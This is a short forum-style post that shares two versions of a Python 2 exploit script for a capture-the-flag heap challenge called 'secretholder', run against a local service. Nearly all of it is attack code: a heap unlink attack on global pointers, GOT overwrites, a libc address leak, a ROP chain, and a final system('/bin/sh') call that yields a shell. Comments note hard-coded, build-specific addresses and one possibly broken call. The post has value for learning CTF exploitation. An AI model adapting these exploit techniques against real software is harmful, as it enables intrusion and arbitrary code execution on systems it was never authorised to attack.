[分享]xxxx
版本1:
from minipwn import *
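def p32(x):
    """Pack the integer `x` as a 4-byte little-endian value (struct "<I")."""
    return struct.pack("<I", x)


def p64(x):
    """Pack the integer `x` as an 8-byte little-endian value (struct "<Q")."""
    return struct.pack("<Q", x)


def u64(x):
    """Unpack exactly 8 little-endian bytes `x` into an unsigned integer (struct "<Q").

    Raises struct.error when `x` is not exactly 8 bytes long, exactly as the
    original lambda did; callers pad short input with ljust(8, '\x00') first.
    """
    return struct.unpack("<Q", x)[0]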
# Menu numbers for the three secret sizes; keep()/wipe()/renew() send one of
# them as str(level) after the "3. Huge secret" prompt.
small= 1
big = 2
huge = 3
# Connection to the challenge service; `remote` comes from minipwn (not shown here).
s = remote('127.0.0.1', 55555)
def keep(level, buf='A'*8):
    """Drive menu option 1 (the "keep" action): pick `level`, then send `buf` as the secret."""
    dialogue = (
        ('3. Renew secret\n', '1'),
        ('3. Huge secret\n', str(level)),
        ('Tell me your secret: \n', buf),
    )
    for prompt, reply in dialogue:
        s.recvuntil(prompt)
        s.send(reply)
def wipe(level):
    """Drive menu option 2 (the "wipe" action) for the secret size `level`."""
    menu_prompt = '3. Renew secret\n'
    size_prompt = '3. Huge secret\n'
    s.recvuntil(menu_prompt)
    s.send('2')
    s.recvuntil(size_prompt)
    s.send(str(level))
def renew(level, buf):
    """Drive menu option 3 ("Renew secret"): pick `level`, then send `buf` as the new secret."""
    steps = [
        ('3. Renew secret\n', '3'),
        ('3. Huge secret\n', str(level)),
        ('Tell me your secret: \n', buf),
    ]
    for expected, answer in steps:
        s.recvuntil(expected)
        s.send(answer)
# ---- exploit flow, version 1 ----
# Everything below is tied to one specific build of the challenge binary and
# libc: the addresses are hard-coded, and concatenating str literals with
# struct.pack() output only works on Python 2 (str and bytes are one type there).
# Allocation/free sequence the payload below relies on; the heap state it
# produces is not visible here -- verify against the binary before reuse.
keep(huge)
wipe(huge)
keep(small)
keep(big)
wipe(small)
wipe(big)
# Address of the global huge-secret pointer in the target binary (hard-coded,
# so only valid for this build).
phuge = 0x6020a8
# fd/bk are offsets of phuge; the comment at the wipe(big) call below states
# the expected outcome (phuge == fd).
fd = phuge-0x18
bk = phuge-0x10
# chunk 0 (unlinked)
payload = '\x00' * 0x10 + p64(fd) + p64(bk)
# chunk 1 (to be freed)
payload += p64(0x20) + p64(0x90)
payload += 'A' * 0x80
# chunk 2
payload += p64(0x0) + p64(0x11)
# chunk 3 (prev_inuse should be set to 0x1 to make sure chunk 2 is not free, so that chunk 2 won't be unlinked)
payload += p64(0x0) + p64(0x11)
keep(huge,payload)
# unlink attack, then phuge == fd
wipe(big)
# Binary path and GOT entries come from the author's environment.
elf=ELF('/root/Desktop/secretholder')
got_atoi = elf.got['atoi']
got_free = elf.got['free']
# pbig phuge psmall
buf = '\x00' * 0x10 + p64(got_atoi) + p64(got_free) + p64(got_atoi) + p32(1)*3 #bigExists hugeExists smallExists
#here can only renew huge for small and big are all wiped, overwrite pbig phuge psmall
renew(huge, buf)
#overwrite free@got
plt_puts = elf.plt['puts']
renew(3, p64(plt_puts))  # 3 == huge; the named constant would read better
# call puts to leak atoi
wipe(big)
# Read one output line (trailing '\n' dropped) and unpack it as a little-endian
# qword; ljust pads the short leak to the 8 bytes "<Q" requires.
data = s.recvuntil('\n')[:-1]
libc_atoi = u64(data.ljust(8, '\x00'))
# Libc base = leaked atoi - atoi offset in the local libc copy; this only holds
# when the remote libc build is identical to the local one.
e=ELF('/lib/x86_64-linux-gnu/libc.so.6')
e.address=libc_atoi - e.symbols['atoi']
libc_system = e.address + e.symbols['system']
# overwrite atoi@got to address of system
renew(small,p64(libc_system))
s.send('sh\x00')
s.interactive()
版本2:
from minipwn import *
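def p32(x):
    """Pack the integer `x` as a 4-byte little-endian value (struct "<I")."""
    return struct.pack("<I", x)


def p64(x):
    """Pack the integer `x` as an 8-byte little-endian value (struct "<Q")."""
    return struct.pack("<Q", x)


def u64(x):
    """Unpack exactly 8 little-endian bytes `x` into an unsigned integer (struct "<Q").

    Raises struct.error when `x` is not exactly 8 bytes long, exactly as the
    original lambda did; callers pad short input with ljust(8, '\x00') first.
    """
    return struct.unpack("<Q", x)[0]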
# Menu numbers for the three secret sizes; keep()/wipe()/renew() send one of
# them as str(level) after the "3. Huge secret" prompt.
small= 1
big = 2
huge = 3
# Connection to the challenge service; `remote` comes from minipwn (not shown here).
s = remote('127.0.0.1', 55555)
def keep(level):
    """Drive menu option 1 (the "keep" action) for `level`, storing eight 'A's as the secret."""
    dialogue = (
        ('3. Renew secret', '1'),
        ('3. Huge secret', str(level)),
        ('Tell me your secret: ', 'A'*8),
    )
    for prompt, reply in dialogue:
        s.recvuntil(prompt)
        s.send(reply)
def wipe(level):
    """Drive menu option 2 (the "wipe" action) for the secret size `level`."""
    menu_prompt = '3. Renew secret'
    size_prompt = '3. Huge secret'
    s.recvuntil(menu_prompt)
    s.send('2')
    s.recvuntil(size_prompt)
    s.send(str(level))
def renew(level, buf):
    """Drive menu option 3 ("Renew secret"): pick `level`, then send `buf` as the new secret."""
    steps = [
        ('3. Renew secret', '3'),
        ('3. Huge secret', str(level)),
        ('Tell me your secret: ', buf),
    ]
    for expected, answer in steps:
        s.recvuntil(expected)
        s.send(answer)
# ---- exploit flow, version 2 (leaks __libc_start_main instead of atoi) ----
# Same caveats as version 1: every address is specific to this build of the
# binary/libc, and the script is Python 2 only (str/struct.pack concatenation
# and the `print` statement further down).
# Allocation/free sequence the buffer below depends on; the resulting heap
# layout is not visible here -- verify against the binary before reuse.
keep(huge)
wipe(huge)
keep(small)
wipe(small)
keep(huge)
wipe(small)
keep(small)
keep(big)
# Address of the global small-secret pointer in the target binary (hard-coded).
psmall = 0x6020B0
fd=psmall-0x18
bk=psmall-0x10
# NOTE(review): by analogy with version 1's layout, 0x20/0xfb0 look like chunk
# header fields, but the page gives no explanation of 0xfb0 -- confirm against
# the binary's allocation sizes.
buf = '\x00' * 0x10 + p64(fd) + p64(bk) + p64(0x20) + p64(0xfb0)
renew(huge, buf)
wipe(big)
# Binary path and GOT entries come from the author's environment.
elf=ELF('/root/Desktop/secretholder')
memset_got = elf.got['memset']
stack_fail_got = elf.got['__stack_chk_fail']
# Hard-coded code addresses inside the challenge binary (names are the author's).
p_ret = 0x400691
p_read_a_lot = 0x4009F9
buf = '\x00' * 8 + p64(memset_got) + p64(0) + p64(stack_fail_got) + p32(1) # p32(1) is bigExists
renew(1, buf)  # 1 == small; the named constants would read better here and below
renew(1, p64(p_ret))
renew(2, p64(p_read_a_lot))  # 2 == big
p_pop_rdi = 0x400e03
puts_plt = elf.plt['puts']
p_main = 0x400cc2
start_main_got = elf.got['__libc_start_main']
print hex(start_main_got)  # Python 2 print statement; debugging aid only
# NOTE(review): the 0x18-byte prefix and the gadget addresses are build-specific
# -- verify against the binary.
buf = '\x00' * 0x18 +p64(p_pop_rdi) + p64(start_main_got) + p64(puts_plt) + p64(p_main)
s.send(buf)
# Skip the re-printed menu, then read the leaked line (trailing '\n' dropped)
# and unpack it as a little-endian qword padded to the 8 bytes "<Q" requires.
s.recvuntil('3. Renew secret\n')
data = s.recvuntil('\n')[:-1]
__libc_start_main = u64(data.ljust(8, '\x00'))
# Libc base from the leak; only valid when the local libc matches the remote one.
e=ELF('/lib/x86_64-linux-gnu/libc.so.6')
e.address=__libc_start_main-e.symbols['__libc_start_main']
libc_system = e.address + e.symbols['system']
# NOTE(review): pwntools' ELF.search() returns a generator (it would need
# next()); whether minipwn's ELF returns an address directly cannot be
# confirmed from this page.
libc_sh = e.search('/bin/sh')
#execute system('/bin/sh')
buf = '\x00' * 0x18 + p64(p_pop_rdi) + p64(libc_sh) + p64(libc_system)
s.recvuntil('3. Renew secret')
s.send(buf)
s.interactive()